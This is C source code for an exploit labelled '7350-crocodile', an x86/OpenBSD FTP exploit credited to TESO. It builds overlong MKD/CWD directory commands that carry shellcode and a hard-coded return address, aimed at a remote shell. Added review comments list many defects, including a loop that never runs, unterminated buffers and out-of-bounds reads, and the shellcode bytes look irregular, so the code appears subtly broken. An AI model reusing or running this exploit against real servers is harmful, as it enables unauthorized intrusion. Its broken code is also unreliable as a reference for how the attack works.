/* 7350-crocodile - x86/OpenBSD ftp exploit
 *
 * by lorian and scut / TESO
 *
 *
 * TESO CONFIDENTIAL - SOURCE MATERIALS
 *
 * This is unpublished proprietary source code of TESO Security.
 *
 * The contents of these coded instructions, statements and computer
 * programs may not be disclosed to third parties, copied or duplicated in
 * any form, in whole or in part, without the prior written permission of
 * TESO Security. This includes especially the Bugtraq mailing list, the
 * www.hack.co.za website and any public exploit archive.
 *
 * (C) COPYRIGHT TESO Security, 2002
 * All Rights Reserved
 *
 *****************************************************************************
 *
 * greetz: synnergy, GOBBLES Security
 *
 */
#include <stdio.h>
#include <string.h>
/*
 * Hard-coded 32-bit address constant. main() prints RET + offset on stderr
 * and stores RET (without the offset) into buf2.
 */
#define RET 0xbfffeb30

/* Version string; no code visible in this listing references it. */
#define VERSION "0.2.0"
/* Login strings that main() prints in its "user" / "pass" lines. */
#define USERNAME "anonymous"
#define PASSWORD "guest@"
/*
 * Opaque byte string: 118 bytes as written, so sizeof(shellcode) is 119 with
 * the implicit terminating NUL. main() passes it to mkd() as if it were a
 * directory name and reports its size on stderr.
 *
 * NOTE(review): nothing in this file decodes or documents these bytes, so
 * what they do is unverified here. The file header's description is not
 * evidence of their behaviour.
 */
char shellcode[] =

    "\x32\xdb\x81\xd1\xb1\x72\xcd\x83"
    "\x21\x21\x31\xc2\x32\xdb\xb5\x27"
    "\xcd\x71\x23\xc2\xb3\x72\xcd\x81"
    "\x32\xc1\x12\xdb\xb4\x3e\xcd\x81"
    "\xeb\x4f\x35\xc2\x31\xc1\x5e\xb1"
    "\x32\x7d\x5e\x98\xfe\xc2\xb8\xed"
    "\xcd\x79\x38\xc1\x1d\x3e\x18\xb1"
    "\x3d\xcd\x82\x32\xc1\xbb\xd2\xd2"
    "\xd2\xff\xf2\xdb\x39\xc1\xb2\x11"
    "\x56\x75\xce\x82\x0e\x81\xc9\x13"
    "\xe5\xf2\x1e\xb5\x0d\x8d\x1e\x11"
    "\xcd\x21\x31\xc2\x09\x42\x21\x19"
    "\x70\x48\x21\x41\x9c\xb3\x2b\x81"
    "\xf1\x2d\x2e\x18\x1d\x32\x7c\xcd"
    "\x82\xe2\xac\xff\xff\xff";
/*
 * mkd - print an FTP "MKD" line and a "CWD" line for one path component.
 *
 * dir: NUL-terminated string. Copying starts at index 1, so the first byte
 *      of dir never appears in the output.
 *
 * Every 0xff byte is written twice (presumably Telnet IAC escaping for the
 * FTP control channel - confirm against the protocol in use). The result is
 * written to stdout only; this function does no network I/O.
 *
 * NOTE(review): the copy into the 2048-byte local buffer is not
 * bounds-checked. The escaped form can be up to twice the input length, and
 * the function relies on dir being NUL-terminated.
 */
void mkd(char *dir)
{
    char escaped[2048];
    char *out = escaped;
    size_t len = strlen(dir);
    size_t idx;

    /* Zero-fill so the copied bytes are always followed by a terminator. */
    memset(escaped, 0, sizeof(escaped));

    for (idx = 1; idx < len; idx++) {
        char c = dir[idx];

        if (c == '\xff')
            *out++ = '\xff';
        *out++ = c;
    }

    printf("MKD %s\r\n", escaped);
    printf("CWD %s\r\n", escaped);
}
/*
 * Program entry point. It writes a sequence of FTP command lines (user,
 * pass, cwd, then MKD/CWD pairs via mkd(), then pwd) to stdout, and two
 * diagnostic lines to stderr. This listing contains no socket code: it only
 * produces text.
 *
 * NOTE(review): as written, the function has several defects that make its
 * runtime behaviour undefined or different from what the file header
 * suggests. They are marked inline. `void main` is also non-standard, and
 * atoi() is called although no <stdlib.h> include is visible.
 */
void
main (int argc, char *argv[])
{

    char *buf;          /* never used */
    char buf2[200];
    char buf1[400];
    char dir2[255];
    char *p;
    char *q;
    char tmp[255];
    int a;              /* never used */
    int offset;
    int i;

    /*
     * offset is parsed from argv[0]. argv[0] is conventionally the program
     * name, so atoi() would normally return 0 here - TODO confirm intent.
     */
    if (argc > 0) offset = atoi(argv[0]);
    else offset = 1;

    /*
     * offset is used only in this message; the value stored into buf2 below
     * is plain RET.
     * NOTE(review): "%d" is given a size_t argument (format/type mismatch).
     */
    fprintf(stderr, "ret-addr = 0x%x\n", RET + offset);
    fprintf(stderr, "shell size = %d\n", sizeof(shellcode));

    /*
     * The memset fills all 255 bytes of dir2, so it overwrites the store to
     * dir2[231] and leaves dir2 with no NUL terminator. The later mkd(dir2)
     * call runs strlen() on it, which reads past the array.
     */
    dir2[231] = '\1';
    memset(dir2, '\x70', 255);

    printf("user %s\r\n", USERNAME);
    printf("pass %s\r\n", PASSWORD);
    /* argv[2] is read without checking that argc is at least 3. */
    printf("cwd %s\r\n", argv[2]);

    /* Only the first 150 bytes of buf1 are initialised, plus buf1[399]. */
    memset(buf1, 0x50, 150);
    /* sizeof(argv[0]) is the size of a char pointer, not a string length. */
    p = &buf1[sizeof(argv[0])];
    q = &buf1[399];
    *q = '\x00';
    /*
     * q points past p on entry, so `q <= p` is false and this loop body
     * does not execute as written.
     */
    while(q <= p) {
        strncpy(tmp, p, 80);
        mkd(tmp);
        p+=255; }

    /*
     * mkd() starts copying at index 1, so each of these is emitted without
     * its first byte.
     */
    mkd(dir2);
    mkd(shellcode);
    mkd("bin");
    mkd("sh");

    memset(buf2, 0x30, 40);
    // var 96
    /*
     * Stores RET as a `long` at buf2 offsets 5, 9, 13 and 17. The stores go
     * through a cast char pointer at odd offsets, so they are unaligned.
     * They are 4 bytes apart, so they overlap wherever long is wider than
     * 4 bytes.
     */
    for(i=4; i<20; i+=4)
        *(long *)&buf2[i+1] = RET;
    p = &buf2[0];
    q = &buf2[50];      /* q is not read again after this assignment */
    /*
     * strncpy() copies at most 20 bytes and adds no terminator when the
     * source has no NUL in that range. tmp is otherwise uninitialised, so
     * the strlen() inside mkd() may read past the copied bytes.
     */
    strncpy(tmp, p, 20);
    mkd(tmp);
    printf("pwd\r\n");
}
// milw0rm.com [2002-01-01]